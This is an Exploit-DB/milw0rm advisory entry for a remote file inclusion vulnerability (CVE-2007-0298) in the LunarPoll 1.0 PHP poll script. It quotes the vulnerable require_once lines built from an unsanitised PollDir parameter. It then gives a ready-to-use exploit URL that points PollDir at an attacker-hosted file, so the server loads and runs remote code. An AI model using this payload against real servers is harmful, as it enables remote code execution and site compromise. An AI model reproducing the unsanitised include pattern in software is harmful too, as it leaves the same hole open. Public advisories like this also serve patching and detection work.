LunarPoll 1.0 show.php PollDir Remote File Include Vulnerability

2007-01-12T00:00:00
ID EDB-ID:3117
Type exploitdb
Reporter ilker Kandemir
Modified 2007-01-12T00:00:00

Description

LunarPoll 1.0 (show.php PollDir) Remote File Include Vulnerability. CVE-2007-0298. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------------------------------------------------------------

AYYILDIZ.ORG PreSents...


Script:LunarPoll
Script Download: dexxaboy.com/scripts/lunarpoll/download/

Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>

Code:
require_once($PollDir.'/includes/functions.php');
require_once($PollDir.'/includes/IO.php');

-------------------------------------------------------------------------------------------------------------------

Exploit:  show.php?PollDir=http://attacker.txt?

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR
Special Tnx: AYYILDIZ.ORG

# milw0rm.com [2007-01-12]